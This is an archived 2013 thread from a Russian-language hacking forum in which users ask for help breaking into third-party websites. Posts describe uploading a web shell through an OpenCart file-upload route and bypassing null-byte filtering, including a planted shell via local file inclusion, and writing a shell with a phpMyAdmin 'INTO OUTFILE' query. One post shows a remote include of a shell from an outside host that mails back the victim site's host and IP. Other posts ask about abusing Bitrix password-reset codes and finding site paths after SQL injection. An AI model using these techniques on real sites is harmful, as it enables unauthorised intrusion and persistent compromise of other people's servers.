ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
31.07.2013, 00:13
|
|
Участник форума
Регистрация: 27.04.2009
Сообщений: 189
Провел на форуме:
1141766
Репутация:
69
|
|
Всем привет! Дело имею с opencart 1.5.3.1 и 1.5.2.1 . Проблема вот в чем: успешно работает заливка файла через route=product/product/upload, получаю шифрованный ответ в json, ключ я узнал и соответственно имя файла, которое получилось на сервере тоже. Попробовал залить shell на 1.5.3.1 - все ок, работает. Заливаю также на 1.5.2.1 - болт. Версия php на обоих серваках X-Powered-By PHP/5.2.17. Покажу пример имен файлов в обоих случаях:
Код:
Code:
Успешная заливка: wso2.php.jpg.6ffe4fcbb409d434ac81279319644c8c - он работает, тут все хорошо
Код:
Code:
Неудачная заливка: test.php&#;.jpg.8604d5110d3e81f88cee94d06acab263
Как видно проблема в нуль-байте, скорее всего magic quotes. Прошу совета! Как это обойти и все-таки выполнить shell , очень нужно. |
|
|
31.07.2013, 22:45
|
|
Участник форума
Регистрация: 27.04.2009
Сообщений: 189
Провел на форуме:
1141766
Репутация:
69
|
|
Вопрос
Подвержен ли данный код LFI ?
В папке "../../download" лежит шелл, как его проинклудить через
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$route[/COLOR][/COLOR]
?
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]public function[/COLOR][COLOR="#0000BB"]__construct[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$route[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$args[/COLOR][COLOR="#007700"]= array()) {
[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$parts[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'../'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"], (string)[/COLOR][COLOR="#0000BB"]$route[/COLOR][COLOR="#007700"]));
foreach ([/COLOR][COLOR="#0000BB"]$parts[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$part[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#0000BB"]$part[/COLOR][COLOR="#007700"];
if ([/COLOR][COLOR="#0000BB"]is_dir[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]DIR_APPLICATION[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'controller/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"])) {
[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]array_shift[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$parts[/COLOR][COLOR="#007700"]);
continue;
}
if ([/COLOR][COLOR="#0000BB"]is_file[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]DIR_APPLICATION[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'controller/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'../'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"]) .[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"])) {
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]file[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]DIR_APPLICATION[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'controller/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'../'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"]) .[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]class[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'Controller'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]preg_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/[^a-zA-Z0-9]/'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]array_shift[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$parts[/COLOR][COLOR="#007700"]);
break;
}
}
if ([/COLOR][COLOR="#0000BB"]$args[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]args[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$args[/COLOR][COLOR="#007700"];
}
[/COLOR][COLOR="#0000BB"]$method[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]array_shift[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$parts[/COLOR][COLOR="#007700"]);
if ([/COLOR][COLOR="#0000BB"]$method[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]method[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$method[/COLOR][COLOR="#007700"];
} else {
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]method[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'index'[/COLOR][COLOR="#007700"];
}
}
public function[/COLOR][COLOR="#0000BB"]getFile[/COLOR][COLOR="#007700"]() {
return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]file[/COLOR][COLOR="#007700"];
}
public function[/COLOR][COLOR="#0000BB"]getClass[/COLOR][COLOR="#007700"]() {
return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]class[/COLOR][COLOR="#007700"];
}
public function[/COLOR][COLOR="#0000BB"]getMethod[/COLOR][COLOR="#007700"]() {
return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]method[/COLOR][COLOR="#007700"];
}
public function[/COLOR][COLOR="#0000BB"]getArgs[/COLOR][COLOR="#007700"]() {
return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]args[/COLOR][COLOR="#007700"];
}
}[/COLOR][/COLOR]
|
|
|
|
11.08.2013, 19:45
|
|
Новичок
Регистрация: 01.08.2009
Сообщений: 12
Провел на форуме:
104424
Репутация:
0
|
|
LFI, как можно обойти фильтрацию слешей?
|
|
|
|
12.08.2013, 10:03
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от stan_q
stan_q said:
LFI, как можно обойти фильтрацию слешей?
Для Windows - бэк-слэшами.
Ещё через URL-encode можно попробовать.
|
|
|
|
02.09.2013, 23:33
|
|
Guest
Сообщений: n/a
Провел на форуме:
626
Репутация:
0
|
|
Нашел админку phpMyAdmin (Version information: 3.4.10.2), крутится на Apache/2.2.3, CentOS.
Есть доступ к root на phpMyAdmin.
Как получить шелл?
Смотрел видео типа: http://youtu.be/fiIO_X0gJoU
Пробовал не выходит. В туториале все шаманится на Xampp под виндой.
Очевидно нету прав на запись в директорию или не правильно указываю путь.
Код:
Code:
SELECT * FROM shell INTO OUTFILE '/var/www/shell.php';
Результат:
Код:
Code:
#1 - Can't create/write to file '/var/www/shell.php' (Errcode: 13)
Ткните носом, плиз. |
|
|
|
03.09.2013, 10:40
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от Kevin
Kevin said:
Нашел админку phpMyAdmin (Version information: 3.4.10.2), крутится на Apache/2.2.3, CentOS.
Есть доступ к root на phpMyAdmin.
Как получить шелл?
Смотрел видео типа: http://youtu.be/fiIO_X0gJoU
Пробовал не выходит. В туториале все шаманится на Xampp под виндой.
Очевидно нету прав на запись в директорию или не правильно указываю путь.
Код:
Code:
SELECT * FROM shell INTO OUTFILE '/var/www/shell.php';
Результат:
Код:
Code:
#1 - Can't create/write to file '/var/www/shell.php' (Errcode: 13)
Ткните носом, плиз. !!!!
Сообщение от None
Очевидно нету прав на запись в директорию или не правильно указываю путь.
|
|
|
|
16.09.2013, 00:29
|
|
Участник форума
Регистрация: 10.03.2005
Сообщений: 234
Провел на форуме:
936234
Репутация:
56
|
|
Вопрос по Bitrix:
В БД в таблице юзер есть колонка "CHECKWORD"
На сайте Битрикса в хелпе прочел что эта колонка содержит код для восстановления пароля.
Насколько я понял - с помощю этого кода , как бы, можно поменять пасс. Зашел в восстановление пасса. Там есть поле для этого кода. Ввел. Но пишет что код не верный.
Как же все таки работает восстановление в Битрикс? Кто знает? Может все таки нужно вначале нажимать на ссылку для восстановления пароля для отправки на мыло и тогда генерится новый код (а этот уже не рабочий, устаревший)? Или еще какая мутка?
|
|
|
|
27.09.2013, 14:23
|
|
Guest
Сообщений: n/a
Провел на форуме:
0
Репутация:
0
|
|
Здравствуйте, есть у меня такой инклуд
include("http://www.mysite.ru/shell.php");
Как мне определить на каких сайтах он работает, пробовал в файл shell.php засунуть такой код
$ip=($_SERVER['SERVER_ADDR']);
$host=($_SERVER['SERVER_NAME']);
mail("pochta@yandex.ru", "$host", "$host\n$ip");
но приходят данные сайта mysite.ru, а мне нужно удаленного(на котором он подключен)?
|
|
|
|
28.09.2013, 01:06
|
|
Guest
Сообщений: n/a
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от Martyn911
Martyn911 said:
Здравствуйте, есть у меня такой инклуд
include("http://www.mysite.ru/shell.php");
Как мне определить на каких сайтах он работает, пробовал в файл shell.php засунуть такой код
$ip=($_SERVER['SERVER_ADDR']);
$host=($_SERVER['SERVER_NAME']);
mail("pochta@yandex.ru", "$host", "$host\n$ip");
но приходят данные сайта mysite.ru, а мне нужно удаленного(на котором он подключен)?
никто не знает или написал очень запутано?
|
|
|
|
06.10.2013, 17:57
|
|
Guest
Сообщений: n/a
Провел на форуме:
15345
Репутация:
5
|
|
Нашёл на сайте SQL-inj.
Данных для авторизации в админке там не было, но была таблица mysql.
Разхешил пасс и попал в phpmyadmin(v 3.5.7).
Остаётся только залить шелл, но я не нашёл полного пути.
При попытке спровоцировать ошибку в скрипте с SQL-inj происходит редирект на 404.
Так же есть READ FILE.
Server type: Apache/2.2.24 (FreeBSD) PHP/5.4.10 mod_ssl/2.2.24 OpenSSL/0.9.8q DAV/2 (Speed: 0.04)
Version: PHP/5.4.10
Собственно как можно раскрыть полный путь к сайту??
М.б. в логах каких-нибудь прочитать??
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
